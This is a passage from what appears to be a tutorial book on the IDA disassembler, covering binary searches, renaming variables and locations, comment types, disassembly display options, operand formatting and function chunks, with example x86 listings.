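    return value + 0x20 if 0x41 <= value <= 0x5A else value


def find_bytes(haystack: bytes, needle: bytes, case_sensitive: bool) -> int:
    """Return the index of the first match, or -1 if there is none."""
    if not case_sensitive:
        haystack = bytes(fold(b) for b in haystack)
        needle = bytes(fold(b) for b in needle)
    return haystack.find(needle)


data = bytes.fromhex("90 e9 61 c3 90")   # contains E9 61 C3, not E9 41 C3
pattern = bytes.fromhex("e9 41 c3")

print(find_bytes(data, pattern, case_sensitive=False))  # 1: 0x41 folds to 0x61
print(find_bytes(data, pattern, case_sensitive=True))   # -1: exact bytes absent
```

Any pattern byte in the range 0x41 through 0x5A (or 0x61 through 0x7A) is subject to the same effect, so opcode searches should be run with Case-sensitive selected.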

Searching for subsequent matches for binary data is done using CTRL-B

or SearchNext Sequence of Bytes. Finally, it is not necessary to conduct

your binary searches from within the Hex View window. IDA allows you to

specify binary search criteria while the disassembly view is active, in which

case a successful search will jump the disassembly window to the location

whose underlying bytes match the specified search criteria.

Summary

The intent of this chapter was to provide you with the minimum essential

skills for effectively making your way around a disassembly. The overwhelming

majority of your interactions with IDA will involve the operations that we have

discussed so far. With navigation safely under your belt, the logical next step

is learning how to modify IDA databases to suit your particular needs. In the

next chapter we begin to look at how to make the most basic changes to a

disassembly as a means of adding new knowledge based on our understanding

of a binary’s content and behavior.

DISASSEMBLY MANIPULATION

After navigation, the next most significant

features of IDA are designed to allow you to

modify the disassembly to suit your needs. In

this chapter we will show that because of IDA’s

underlying database nature, changes that you make to

a disassembly are easily propagated to all IDA subviews

to maintain a consistent picture of your disassembly. One of the most powerful

features that IDA offers is the ability to easily manipulate disassemblies to

add new information or reformat a listing to suit your particular needs. IDA

automatically handles operations such as global search and replace when it

makes sense to do so and makes trivial work of reformatting instructions as

data and vice versa, features not available in other disassembly tools.

NOTE Remember: There is no undo in IDA. Keep this in mind as you start manipulating the

database. The closest you’re going to get is saving the database often and reverting to a

recently saved version of the database.

Names and Naming

At this point, we have encountered two categories of names in IDA dis-

assemblies: names associated with virtual addresses (named locations) and

names associated with stack frame variables. In the majority of cases IDA

will automatically generate all of these names according to the guidelines

previously discussed. IDA refers to such automatically generated names as

dummy names.

Unfortunately, these names seldom hint at the intended purpose of a

location or variable and therefore don’t generally add to our understanding of

a program’s behavior. As you begin to analyze any program, one of the first

and most common ways that you will want to manipulate a disassembly listing

is to change default names into more meaningful names. Fortunately, IDA

allows you to easily change any name and handles all of the details of prop-

agating all name changes throughout the entire disassembly. In most cases,

changing a name is as simple as clicking the name you wish to change (this

highlights the name) and using the N hotkey to open a name-change dialog.

Alternatively, right-clicking the name to be changed generally presents a

context-sensitive menu that contains a Rename option, as shown in Figure 6-5.

The name-change process does differ somewhat between stack variables and

named locations, and these differences are detailed in the following sections.

Parameters and Local Variables

Names associated with stack variables are the simplest form of name in a

disassembly listing, primarily because they are not associated with a specific

virtual address and thus can never appear in the Names window. As in most

programming languages, such names are considered to be restricted in

scope based on the function to which a given stack frame belongs. Thus,

every function in a program might have its own stack variable named arg_0,

but no function may have more than one variable named arg_0. The dialog

shown in Figure 7-1 is used to rename a stack variable.

Figure 7-1: Renaming a stack variable

Once a new name is supplied, IDA takes care of changing every occur-

rence of the old name in the context of the current function. Changing the

name of var_5C to y for demo_stackframe would result in the new listing shown

here, with changes at X.

.text:00401090 ; =========== S U B R O U T I N E =========================

.text:00401090

.text:00401090 ; Attributes: bp-based frame

.text:00401090

.text:00401090 demo_stackframe proc near ; CODE XREF: sub_4010C1+41↓p

.text:00401090

.text:00401090 var_60 = dword ptr -60h

.text:00401090 Xy = dword ptr -5Ch

.text:00401090 var_58 = byte ptr -58h

.text:00401090 var_C = dword ptr -0Ch

.text:00401090 arg_4 = dword ptr 0Ch

.text:00401090 arg_8 = dword ptr 10h

.text:00401090

.text:00401090 push ebp

.text:00401091 mov ebp, esp

.text:00401093 sub esp, 78h

.text:00401096 mov eax, [ebp+arg_8]

.text:00401099 mov [ebp+var_C], eax

.text:0040109C mov eax, [ebp+arg_4]

.text:0040109F mov [ebp+y], eax

.text:004010A2 mov [ebp+var_60], 0Ah

.text:004010A9 mov [ebp+var_58], 41h

.text:004010AD mov eax, [ebp+Xy]

.text:004010B0 mov [esp+4], eax

.text:004010B4 mov eax, [ebp+var_60]

.text:004010B7 mov [esp], eax

.text:004010BA call bar

.text:004010BF leave

.text:004010C0 retn

.text:004010C0 demo_stackframe endp

Should you ever wish to revert to the default name for a given variable,

open the renaming dialog and enter a blank name, and IDA will regenerate

the default name for you.

Named Locations

Renaming a named location or adding a name to an unnamed location is

slightly different from changing the name of a stack variable. The process

for accessing the name-change dialog is identical (hotkey N), but things

quickly change. Figure 7-2 shows the renaming dialog associated with named

locations.

This dialog informs you exactly what address you are naming along with

a list of attributes that can be associated with the name. The maximum name

length merely echoes a value from one of IDA’s configuration files

(<IDADIR>/cfg/ida.cfg). You are free to use names longer than this value, which will cause

IDA to complain weakly by informing you that you have exceeded the max-

imum name length and offering to increase the maximum name length for

you. Should you choose to do so, the new maximum name length value will

be enforced (weakly) only in the current database. Any new databases that

you create will continue to be governed by the maximum name length con-

tained in the configuration file.

Figure 7-2: Renaming a location

The following attributes can be associated with any named location:

Local name

A local name is restricted in scope to the current function, so the unique-

ness of local names is enforced only within a given function. Like local

variables, two different functions may contain identical local names,

but a single function cannot contain two local names that are identical.

Named locations that exist outside function boundaries cannot be desig-

nated as local names. These include names that represent function names

as well as global variables. The most common use for local names is to

provide symbolic names for the targets of jumps within a function, such

as those associated with branching control structures.

Include in names list

Selecting this option causes a name to be added to the Names window,

which can make the name easier to find when you wish to return to it.

Autogenerated (dummy) names are never included in the Names window

by default.

Public name

A public name is typically a name that is being exported by a binary

such as a shared library. IDA’s parsers typically discover public names

while parsing file headers during initial loading into the database. You

can force a symbol to be treated as public by selecting this attribute. In

general, this has very little effect on the disassembly other than to cause

public annotations to be added to the name in the disassembly listing

and in the Names window.

Autogenerated name

This attribute appears to have no discernible effect on disassemblies.

Selecting it does not cause IDA to automatically generate a name.

Weak name

A weak symbol is a specialized form of public symbol utilized only when

no public symbol of the same name is found to override it. Marking a

symbol as weak has some significance to an assembler but little signifi-

cance in an IDA disassembly.

Create name anyway

As discussed previously, no two locations within a function may be given

the same name. Similarly, no two locations outside any function (in the

global scope) may be given the same name. This option is somewhat

confusing, as it behaves differently depending on the type of name you

are attempting to create.

If you are editing a name at the global scope (such as a function name

or global variable) and you attempt to assign a name that is already in

use in the database, IDA will display the conflicting name dialog, shown

in Figure 7-3, offering to automatically generate a unique numeric suffix

to resolve the conflict. This dialog is presented regardless of whether you

have selected the Create name anyway option or not.

If, however, you are editing a local name within a function and you

attempt to assign a name that is already in use, the default behavior is

simply to reject the attempt. If you are determined to use the given name,

you must select Create name anyway in order to force IDA to generate a

unique numeric suffix for the local name. Of course, the simplest way to

resolve any name conflict is to choose a name that is not already in use.

Figure 7-3: Name conflict dialog
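The scoping rules for local names can be modeled as one set of names per function. The Python sketch below is a simplified illustration, not IDA's implementation: the NameScope class is hypothetical, and the _0, _1 suffix format is an assumption standing in for whatever unique numeric suffix IDA generates. The global-scope case, in which IDA always displays the name conflict dialog, is not modeled.

```python
class NameScope:
    """A set of names that must be unique within a single function."""

    def __init__(self):
        self.names = set()

    def add(self, name, create_anyway=False):
        """Add name to the scope and return the name actually used."""
        if name not in self.names:
            self.names.add(name)
            return name
        if not create_anyway:
            # Default behavior for a duplicate local name: reject it.
            raise ValueError("name already in use: %s" % name)
        # Assumption: the numeric suffix takes the form _0, _1, and so on.
        suffix = 0
        while "%s_%d" % (name, suffix) in self.names:
            suffix += 1
        unique = "%s_%d" % (name, suffix)
        self.names.add(unique)
        return unique


scopes = {"bar": NameScope(), "demo_stackframe": NameScope()}

first = scopes["bar"].add("done")
other = scopes["demo_stackframe"].add("done")  # fine: a different function
try:
    scopes["bar"].add("done")                  # duplicate within bar
    rejected = False
except ValueError:
    rejected = True
forced = scopes["bar"].add("done", create_anyway=True)

print(first, other, rejected, forced)
```

Two functions may each hold a local name done, while a second done inside bar is rejected unless Create name anyway is modeled, in which case a suffixed name is produced.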

A third type of name that is often overlooked is the register name. Within

the boundaries of a function, IDA allows registers to be renamed. It may be

useful to rename a register when a compiler has elected to allocate a variable

in a register rather than on the program stack, and you wish to refer to the

variable using a name more suited to its purpose than EDX, for example.

Use the N hotkey, or right-click the register name and select Rename to open

the register-renaming dialog. When you rename a register you are, in effect,

providing an alias with which to refer to the register for the duration of the

current function (IDA even denotes this alias with an alias = register syntax

at the beginning of the function). IDA takes care of replacing all instances of

the register name with the alias that you provide. It is not possible to rename

a register used in code that does not belong to a function.

Commenting in IDA

Another useful feature in IDA is the ability to embed comments in your

databases. Comments are a particularly useful way to leave notes for yourself

regarding your progress as you analyze a program. In particular, comments

are helpful for describing sequences of assembly language instructions in a

higher-level fashion. For example, you might opt to write comments using C

language statements to summarize the behavior of a particular function. On

subsequent analysis of the function, the comments would serve to refresh your

memory faster than reanalyzing the assembly language statements.

IDA offers several styles of comments, each suited for a different pur-

pose. Comments may be associated with any line of the disassembly listing

using options available from EditComments. Hotkeys or context menus

offer alternate access to IDA’s commenting features. To help you understand

IDA’s commenting features, we refer to the following disassembly of the

function bar:

.text:00401050 ; =============== S U B R O U T I N E =======================================

.text:00401050

.text:00401050 ]; void bar(int j, int k);

.text:00401050 ; Attributes: bp-based frame

.text:00401050

.text:00401050 ^bar proc near ; CODE XREF: demo_stackframe+2A↓p

.text:00401050

.text:00401050 arg_0 = dword ptr 8

.text:00401050 arg_4 = dword ptr 0Ch

.text:00401050

.text:00401050 push ebp

.text:00401051 mov ebp, esp

.text:00401053 sub esp, 8

.text:00401056 \The next three lines test j < k

.text:00401056 mov eax, [ebp+arg_0]

.text:00401059 cmp eax, [ebp+arg_4]

.text:0040105C jge short loc_40106C Z; Repeating comments get echoed at referencing locations

.text:0040105E mov [esp], offset aTheSecondParam [; "The second parameter is larger"

.text:00401065 call printf

.text:0040106A jmp short locret_40108E X; jump to the end of the function

.text:0040106C ; ---------------------------------------------------------------------------

.text:0040106C

.text:0040106C loc_40106C: ; CODE XREF: bar+C↑j

.text:0040106C mov eax, [ebp+arg_0] Y; Repeating comments get echoed at referencing locations

.text:0040106F cmp eax, [ebp+arg_4]

.text:00401072 jle short loc_401082

.text:00401074 mov [esp], offset aTheFirstParame [; "The first parameter is larger"

.text:0040107B call printf

.text:00401080 jmp short locret_40108E

.text:00401082 ; ---------------------------------------------------------------------------

.text:00401082

.text:00401082 loc_401082: ; CODE XREF: bar+22↑j

.text:00401082 mov [esp], offset aTheParametersA [; "the parameters are equal"

.text:00401089 call printf

.text:0040108E

.text:0040108E locret_40108E: ; CODE XREF: bar+1A↑j

.text:0040108E ; bar+30↑j

.text:0040108E leave

.text:0040108F retn

.text:0040108F bar endp

The majority of IDA comments are prefixed with a semicolon to indicate

that the remainder of the line is to be considered a comment. This is similar to

commenting styles used by many assemblers and equates to #-style comments

in many scripting languages or //-style comments in C++.

Regular Comments

The most straightforward comment is the regular comment. Regular comments

are placed at the end of existing assembly lines, as at X in the preceding

listing. Right-click in the right margin of the disassembly or use the colon (:)

hotkey to activate the comment entry dialog. Regular comments will span

multiple lines if you enter multiple lines in the comment entry dialog. Each

of the lines will be indented to line up on the right side of the disassembly.

To edit or delete a comment, you must reopen the comment entry dialog

and edit or delete all of the comment text as appropriate. By default, regular

comments are displayed as blue text.

IDA itself makes extensive use of regular comments. During the analysis

phase, IDA inserts regular comments to describe parameters that are being

pushed for function calls. This occurs only when IDA has parameter name

or type information for the function being called. This information is typi-

cally contained within type libraries, which are discussed in Chapter 8 and

Chapter 13, but also may be entered manually.

Repeatable Comments

A repeatable comment is a comment that is entered once but that may appear

automatically in many locations throughout the disassembly. Location Y

in the previous listing shows a repeatable comment. In a disassembly listing

the default color for repeatable comments is blue, making them indistinguish-

able from regular comments. It is the behavior rather than the appearance

that matters in this case. The behavior of repeatable comments is tied to the

concept of cross-references. When one program location refers to a second

location that contains a repeatable comment, the comment associated with

the second location is echoed at the first location. By default, the echoed

comment appears as gray text, making the repeated comment distinguish-

able from other comments. The hotkey for repeatable comments is the

semicolon (;), making it very easy to confuse repeatable comments and

regular comments.

In the previous listing, note that the comment at Z is identical to the

comment at Y. The comment at Y has been repeated because the instruction

at Z (jge short loc_40106C) refers to the address of Y (0040106C).

A regular comment added at a location that is displaying a repeated

comment overrides the repeated comment so that only the regular comment

will be displayed. If you entered a regular comment at Z, the repeatable

comment inherited from Y would no longer be displayed at Z. If you then

deleted the regular comment at Z, the repeatable comment would once

again be displayed.
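The display rules for regular and repeatable comments can be summarized in a small Python model. This is a sketch under stated assumptions rather than IDA's logic: the dictionaries and the displayed_comment function are hypothetical, each address is given at most one outgoing cross-reference, and the order in which an address's own regular and repeatable comments are checked is this sketch's choice, since the text specifies only that a regular comment hides an echoed one.

```python
regular = {}  # address -> regular comment
repeatable = {
    0x40106C: "Repeating comments get echoed at referencing locations",
}
xref_from = {0x40105C: 0x40106C}  # jge short loc_40106C


def displayed_comment(addr):
    """Return the comment shown at addr, or None if nothing is shown."""
    if addr in regular:
        return regular[addr]          # a regular comment wins
    if addr in repeatable:
        return repeatable[addr]       # the location's own repeatable comment
    target = xref_from.get(addr)
    if target is not None:
        return repeatable.get(target)  # echo of the referenced location
    return None


print(displayed_comment(0x40105C))    # echoed repeatable comment
regular[0x40105C] = "skip ahead when j >= k"
print(displayed_comment(0x40105C))    # regular comment overrides the echo
del regular[0x40105C]
print(displayed_comment(0x40105C))    # the echo is displayed again
```

Deleting the regular comment restores the echo because the repeatable comment itself was never modified; it lives only at the referenced address.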

A variant form of repeatable comment is associated with strings. When-

ever IDA automatically creates a string variable, a virtual repeatable com-

ment is added at all locations referencing the string variable. We say virtual

because the comment cannot be edited by the user. The content of the

virtual comment is set to the content of the string variable and displayed

throughout the database just as a repeatable comment would be. As a result,

any program locations that refer to the string variable will display the con-

tents of the string variable as a repeated comment. The three comments

annotated [ demonstrate such comments displayed as a result of references

to string variables.

Anterior and Posterior Lines

Anterior and posterior lines are full-line comments that appear either imme-

diately before (anterior) or after (posterior) a given disassembly line. These

comments are the only IDA comments that are not prefixed with the semicolon

character. An example of an anterior line comment appears at \ in the pre-

vious listing. You can distinguish an anterior line from a posterior line by

comparing the address associated with the line to the address associated with

the instruction immediately preceding or following the line.

Function Comments

Function comments allow you to group comments for display at the top of a

function’s disassembly listing. An example of a function comment is shown

at ], where the function prototype has been entered. You enter function

comments by first highlighting the function name at the top of the function

(^) and then adding either a regular or repeatable comment. Repeatable

function comments are echoed at any locations that call the commented

function. IDA will automatically generate function prototype-style comments

when you use the Set Function Type command discussed in Chapter 8.

Basic Code Transformations

In many cases you will be perfectly content with the disassembly listings

that IDA generates. In some cases you won’t. As the types of files that you

analyze diverge farther and farther from ordinary executables generated with

common compilers, you may find that you need to take more control of the

disassembly analysis and display processes. This will be especially true if you

find yourself performing analysis of obfuscated code or files that utilize a

custom (unknown to IDA) file format.

Code transformations facilitated by IDA include the following:

- Converting data into code
- Converting code into data
- Designating a sequence of instructions as a function
- Changing the starting or ending address of an existing function
- Changing the display format for instruction operands

The degree to which you utilize these operations depends on a wide

variety of factors and personal preferences. In general, if a binary is very

complex, or if IDA is not familiar with the code sequences generated by the

compiler used to build the binary, then IDA will encounter more problems

during the analysis phase, and you will need to make manual adjustments to

the disassembled code.

Code Display Options

The simplest transformations that you can make to a disassembly listing involve

customizing the amount of information that IDA generates for each disas-

sembly line. Each disassembled line can be considered as a collection of parts

that IDA refers to, not surprisingly, as disassembly line parts. Labels, mnemonics,

and operands are always present in a disassembly line. You can select additional

parts for each disassembly line via Options▸General on the Disassembly

tab, as shown in Figure 7-4.

Figure 7-4: Disassembly line display options

The Display Disassembly Line Parts section in the upper right offers several

options for customizing disassembly lines. For IDA’s text disassembly view,

line prefixes, comments, and repeatable comments are selected by default.

Each item is described here and shown in the listing that follows.

Line prefixes

A line prefix is the section:address portion of each disassembly line.

Deselecting this option causes the line prefix to be removed from each

disassembly line (the default in graph view). To illustrate this option, we

have disabled line prefixes in the next listing.

Stack pointer

IDA performs extensive analysis on each function in order to track

changes to the program stack pointer. This analysis is essential in

understanding the layout of each function’s stack frame. Selecting the

Stack pointer option causes IDA to display the relative change to the

stack pointer throughout the course of each function. This may be

useful in recognizing discrepancies in calling conventions (IDA may

not understand that a particular function uses stdcall, for example) or

unusual manipulations of the stack pointer. Stack pointer tracking is

shown in the leftmost column of the listing. In this example, the stack pointer has

changed by four bytes following the first instruction and a total of 0x7C

bytes following the third instruction. By the time the function completes,

the stack pointer is restored to its original value (a relative change of

zero bytes). Whenever IDA encounters a function return statement and

detects that the stack pointer value is not zero, an error condition is

flagged and the instruction line highlighted in red. In some cases, this

might be a deliberate attempt to frustrate automated analysis. In other

cases, it may be that a compiler utilizes prologues and epilogues that

IDA can’t accurately analyze.

Comments and repeatable comments

Deselecting either of these options inhibits the display of the respective

comment type. This may be useful if you wish to declutter a disassembly

listing.

Auto comments

IDA can automatically comment some instruction types. This can serve

as a reminder as to how particular instructions behave. No comments are

added for trivial instructions such as the x86 mov. The comments at Y

are examples of auto comments. User comments take precedence over

auto comments, so if you want to see IDA’s automatic comment

for a line, you’ll have to remove any comments you’ve added (regular or

repeatable).

Bad instruction <BAD> marks

IDA can mark instructions that are legal for the processor but that may

not be recognized by some assemblers. Undocumented (as opposed to

illegal) CPU instructions may fall in this category. In such cases IDA will

disassemble the instruction as a sequence of data bytes and display the

undocumented instruction as a comment prefaced with <BAD>. The intent

is to generate a disassembly that most assemblers can handle. Refer to

the IDA help file for more information on the use of <BAD> marks.

Number of opcode bytes

Most disassemblers are capable of generating listing files that display

the generated machine language bytes side by side with the assembly

language instructions from which they are derived. IDA allows you to

view the machine language bytes associated with each instruction by

synchronizing a hex display to the disassembly listing display. You can

optionally view machine language bytes mixed with assembly language

instructions by specifying the number of machine language bytes that

IDA should display for each instruction.

This is fairly straightforward when you are disassembling code for

processors that have a fixed instruction size, but it is somewhat more

difficult for variable-length instruction processors such as the x86, for

which instructions may range from one to more than a dozen bytes in

size. Regardless of the instruction length, IDA reserves display space in

the disassembly listing for the number of bytes that you specify here,

pushing the remaining portions of the disassembly line to the right to

accommodate the specified number of opcode bytes. Number of opcode

bytes has been set to 5 in the following disassembly, and the bytes can be seen in

the columns that follow the stack pointer value. The + symbol at [ indicates that the specified

instruction is too long to be fully displayed given the current settings.

000 55 push ebp

004 89 E5 mov ebp, esp

004 83 EC 78 sub esp, 78h Y; Integer Subtraction

07C 8B 45 10 mov eax, [ebp+arg_8]

07C 89 45 F4 mov [ebp+var_C], eax

07C 8B 45 0C mov eax, [ebp+arg_4]

07C 89 45 A4 mov [ebp+var_5C], eax

07C C7 45 A0 0A [00+ mov [ebp+var_60], 0Ah

07C C6 45 A8 41 mov [ebp+var_58], 41h

07C 8B 45 A4 mov eax, [ebp+var_5C]

07C 89 44 24 04 mov [esp+4], eax

07C 8B 45 A0 mov eax, [ebp+var_60]

07C 89 04 24 mov [esp], eax

07C E8 91 FF FF FF call bar Y; Call Procedure

07C C9 leave Y; High Level Procedure Exit

000 C3 retn Y; Return Near from Procedure
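The stack pointer column in the listing above can be reproduced with a few lines of Python. This is only a sketch under stated assumptions: the tuple encoding of instructions and the helper name track_stack_deltas are invented for illustration and are not part of IDA, only the handful of x86 instructions that appear in the listing are modeled, and call is treated as leaving the stack pointer unchanged (as it would for a cdecl callee).

```python
def track_stack_deltas(instructions, word_size=4):
    """Return the stack pointer delta in effect before each instruction.

    Hypothetical helper for illustration; this is not IDA's algorithm.
    """
    delta = 0            # bytes the stack has grown since function entry
    frame_base = None    # delta at the moment 'mov ebp, esp' executed
    shown = []
    for mnemonic, operands in instructions:
        shown.append(delta)  # the value displayed beside this instruction
        if mnemonic == "push":
            delta += word_size
        elif mnemonic == "pop":
            delta -= word_size
        elif mnemonic == "sub" and operands[0] == "esp":
            delta += operands[1]
        elif mnemonic == "add" and operands[0] == "esp":
            delta -= operands[1]
        elif mnemonic == "mov" and operands == ("ebp", "esp"):
            frame_base = delta
        elif mnemonic == "leave":
            if frame_base is None:
                raise ValueError("leave without a frame pointer setup")
            # leave behaves like: mov esp, ebp ; pop ebp
            delta = frame_base - word_size
    return shown


# A shortened version of the listing (the repeated mov lines are omitted).
listing = [
    ("push", ("ebp",)),
    ("mov", ("ebp", "esp")),
    ("sub", ("esp", 0x78)),
    ("mov", ("eax", "[ebp+arg_8]")),
    ("call", ("bar",)),
    ("leave", ()),
    ("retn", ()),
]

deltas = track_stack_deltas(listing)
for (mnemonic, _), delta in zip(listing, deltas):
    print(f"{delta:03X} {mnemonic}")
```

A nonzero value beside the final retn in such a model corresponds to the condition that IDA highlights in red.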

You can further customize the disassembly display by adjusting the

indentation values and margins shown in the lower right of Figure 7-4. Any

changes to these options affect only the current database. Global settings for

each of these options are stored in the main configuration file, <IDADIR>/

cfg/ida.cfg.

Formatting Instruction Operands

During the disassembly process, IDA makes many decisions regarding how

to format operands associated with each instruction. The biggest decisions

generally revolve around how to format various integer constants used by

the wide variety of instruction types. Among other things, these constants

can represent relative offsets in jump or call instructions, absolute addresses

of global variables, values to be used in arithmetic operations, or programmer-

defined constants. In order to make a disassembly more readable, IDA

attempts to use symbolic names rather than numbers whenever possible.

In some cases, formatting decisions are made based on the context of the

instruction being disassembled (such as a call instruction); in other cases,

the decision is based on the data being used (such as access to a global vari-

able or an offset into a stack frame). In many other cases, the exact context

in which a constant is being used may not be clear. When this happens, the

associated constant is typically formatted as a hexadecimal constant.

If you happen not to be one of the few people in the world who eat, sleep,

and breathe hex, then you will welcome IDA’s operand formatting features.

Right-clicking any constant in a disassembly opens a context-sensitive menu

similar to that shown in Figure 7-5.

Figure 7-5: Formatting options for constants

In this case, menu options are offered enabling the constant (41h) to

be reformatted as decimal, octal, or binary values. Since the constant in this

example falls within the ASCII printable range, an option is also presented to

format the value as a character constant. In all cases, the menu displays the

exact text that will replace the operand text should a particular option be

selected.
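The alternative renderings offered by the menu amount to printing one value in several radixes. The following Python sketch illustrates the idea; the function name operand_formats is made up for this example, the assembler-style radix suffixes (h, o, b) are an assumption about the notation, and the exact text IDA displays may differ. Non-negative values are assumed.

```python
def operand_formats(value):
    """Return candidate renderings of a non-negative integer constant.

    Hypothetical helper; the suffix conventions are assumptions.
    """
    hex_digits = format(value, "X")
    if hex_digits[0] in "ABCDEF":
        # Assemblers usually require a leading digit on hex constants.
        hex_digits = "0" + hex_digits
    formats = {
        "hex": hex_digits + "h",
        "decimal": str(value),
        "octal": format(value, "o") + "o",
        "binary": format(value, "b") + "b",
    }
    # Offer a character form only inside the printable ASCII range.
    if 0x20 <= value <= 0x7E:
        formats["char"] = "'" + chr(value) + "'"
    return formats


for kind, text in operand_formats(0x41).items():
    print(f"{kind:8} {text}")
```

For a value such as 0Ah, which lies outside the printable range, the sketch omits the character form, mirroring the way the menu offers that option only when it makes sense.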

In many cases, programmers use named constants in their source code.

Such constants may be the result of #define statements (or their equivalent),

or they may belong to a set of enumerated constants. Unfortunately, by the

time a compiler is finished with the source code, it is no longer possible to

determine whether the source used a symbolic constant or a literal, numeric

constant. IDA maintains a large catalog of named constants associated with

many common libraries such as the C standard library or the Windows API.

This catalog is accessible via the Use standard symbolic constant option on

the context-sensitive menu associated with any constant value. Selecting this

option for the constant 0Ah in Figure 7-5 opens the symbol-selection dialog

shown in Figure 7-6.

Figure 7-6: Symbol-selection dialog

The dialog is populated from IDA’s internal list of constants after filtering

according to the value of the constant we are attempting to format. In this

case we see all of the constants that IDA knows to be equated with the value

0Ah. If we determined that the value was being used in conjunction with the

creation of an X.25-style network connection, then we might select AF_CCITT

and end up with the following disassembly line:

.text:004010A2 mov [ebp+var_60], AF_CCITT

The list of standard constants is a useful way to determine whether a

particular constant may be associated with a known name and can save a lot

of time reading through API documentation in search of potential matches.
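Filtering a catalog of named constants by value is easy to picture as a reverse lookup. The sketch below uses a tiny hand-made table as a stand-in for IDA's much larger catalog; the table contents, the function names, and the sorted presentation are all assumptions made for illustration.

```python
from collections import defaultdict

# A tiny stand-in for a catalog of named constants (illustrative only).
KNOWN_CONSTANTS = {
    "AF_INET": 2,
    "AF_CCITT": 10,
    "SOCK_STREAM": 1,
    "SW_SHOWDEFAULT": 10,
}


def build_value_index(constants):
    """Group constant names by the numeric value they stand for."""
    index = defaultdict(list)
    for name, value in constants.items():
        index[value].append(name)
    return index


def candidates_for(value, index):
    """Return every known name equated with the given value."""
    return sorted(index.get(value, []))


index = build_value_index(KNOWN_CONSTANTS)
print(candidates_for(0x0A, index))
```

As in the dialog, the lookup only narrows the field. Choosing between unrelated names that share a value still depends on how the surrounding code uses the constant.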

Manipulating Functions

There are a number of reasons that you may wish to manipulate functions

after the initial autoanalysis has been completed. In some cases, such as when

IDA fails to locate a call to a function, functions may not be recognized, as

there may be no obvious way to reach them. In other cases, IDA may fail to

properly locate the end of a function, requiring some manual intervention

on your part to correct the disassembly. IDA may have trouble locating the

end of a function if a compiler has split the function across several address

ranges or when, in the process of optimizing code, a compiler merges com-

mon end sequences of two or more functions in order to save space.

Creating New Functions

Under certain circumstances, new functions can be created where no func-

tion exists. New functions can be created from existing instructions that do

not already belong to a function, or they can be created from raw data bytes

that have not been defined by IDA in any other manner (such as double

words or strings). You create functions by placing the cursor on the first byte

or instruction to be included in the new function and selecting Edit ▸

Functions ▸ Create Function. IDA attempts to convert data to code if necessary.

Then it scans forward to analyze the structure of the function and search

for a return statement. If IDA can locate a suitable end of the function, it

generates a new function name, analyzes the stack frame, and restructures

the code in the form of a function. If it can’t locate the end of the function

or encounters any illegal instructions, then the operation fails.

Deleting Functions

You can delete existing functions using Edit ▸ Functions ▸ Delete Function.

You may wish to delete a function if you believe that IDA has erred in its

autoanalysis.

Function Chunks

Function chunks are commonly found in code generated by the Microsoft

Visual C++ compiler. Chunks are the result of the compiler moving blocks of

code that are less frequently executed in order to squeeze frequently executed

blocks into memory pages that are less likely to be swapped out.

When a function is split in such a manner, IDA attempts to locate all of

the associated chunks by following the jumps that lead to each chunk. In

most cases IDA does a good job of locating all of the chunks and listing each

chunk in the function’s header, as shown in the following partial function

disassembly:

.text:004037AE ChunkedFunc proc near

.text:004037AE

.text:004037AE var_420 = dword ptr -420h

.text:004037AE var_41C = dword ptr -41Ch

.text:004037AE var_4 = dword ptr -4

.text:004037AE hinstDLL = dword ptr 8

.text:004037AE fdwReason = dword ptr 0Ch

.text:004037AE lpReserved = dword ptr 10h

.text:004037AE

.text:004037AE ; FUNCTION CHUNK AT ➊.text:004040D7 SIZE 00000011 BYTES

.text:004037AE ; FUNCTION CHUNK AT .text:004129ED SIZE 0000000A BYTES

.text:004037AE ; FUNCTION CHUNK AT .text:00413DBC SIZE 00000019 BYTES

.text:004037AE

.text:004037AE push ebp

.text:004037AF mov ebp, esp

Function chunks are easily reached by double-clicking the address associated

with the chunk, as at ➊. Within the disassembly listing, function chunks

are denoted by comments that delimit their instructions and that refer to the

owning function, as shown in this listing:

.text:004040D7 ; START OF FUNCTION CHUNK FOR ChunkedFunc

.text:004040D7

.text:004040D7 loc_4040D7: ; CODE XREF: ChunkedFunc+72↑j

.text:004040D7 dec eax

.text:004040D8 jnz loc_403836

.text:004040DE call sub_4040ED

.text:004040E3 jmp loc_403836

.text:004040E3 ; END OF FUNCTION CHUNK FOR ChunkedFunc

In some cases IDA may fail to locate every chunk associated with a func-

tion, or functions may be misidentified as chunks rather than as functions in

their own right. In such cases, you may find that you need to create your own

function chunks or delete existing function chunks.
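One way to think about a chunked function is as a single name that owns several disjoint address ranges. The Python sketch below models that idea using the chunk addresses and sizes from the ChunkedFunc header shown earlier. The class layout and helper names are hypothetical, and the size given for the entry chunk is invented because the listing does not state it.

```python
from dataclasses import dataclass, field


@dataclass
class Function:
    """Hypothetical model of a function that owns several address ranges."""
    name: str
    entry: tuple                       # (start, size) of the entry chunk
    tails: list = field(default_factory=list)

    def chunks(self):
        return [self.entry] + self.tails

    def contains(self, address):
        # Each chunk covers the half-open range [start, start + size).
        return any(start <= address < start + size
                   for start, size in self.chunks())


def owner_of(address, functions):
    """Return the name of the function whose chunks cover the address."""
    for func in functions:
        if func.contains(address):
            return func.name
    return None


chunked = Function(
    name="ChunkedFunc",
    entry=(0x004037AE, 0x100),         # entry chunk size is an assumption
    tails=[(0x004040D7, 0x11), (0x004129ED, 0x0A), (0x00413DBC, 0x19)],
)

print(owner_of(0x004040E3, [chunked]))   # the jmp inside the first tail
print(owner_of(0x004040E8, [chunked]))   # first byte past that tail
```

Appending or removing a function tail corresponds to adding or deleting one entry in the tails list; an address that no chunk covers belongs to no function in this model.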

You create new function chunks by selecting the range of addresses that

belong to the chunk, which must not be part of any existing function, and

selecting Edit ▸ Functions ▸ Append Function Tail. At this point you will be

asked to select the parent function from a list of all defined functions.

NOTE In disassembly listings, function chunks are referred to as just that: function chunks. In

the IDA menu system, function chunks are instead referred to as function tails.

You can delete existing function chunks by positioning the cursor on any

line within the chunk to be deleted and selecting Edit ▸ Functions ▸ Remove

Function Tail. At this point you will be asked to confirm your action prior to

deleting the selected chunk.

If function chunks are turning out to be more trouble than they are worth,

you can ask IDA not to create function chunks by deselecting the Create func-

tion tails loader option when you first load a file into IDA. This option is one

of the loader options accessible via Kernel Options (see Chapter 4) in the

initial file-load dialog. If you disable function tails, the primary difference

that you may notice is that functions that would otherwise have contained

tails contain jumps to regions outside the function boundaries. IDA high-

lights such jumps using red lines and arrows in the arrow windows on the left

side of the disassembly. In the graph view for the corresponding function,

the targets of such jumps are not displayed.

Function Attributes

IDA associates a number of attributes with each function that it recognizes.

The function properties dialog shown in Figure 7-7 can be used to edit many

of these attributes. Each attribute that can be modified is explained here.

Name of function

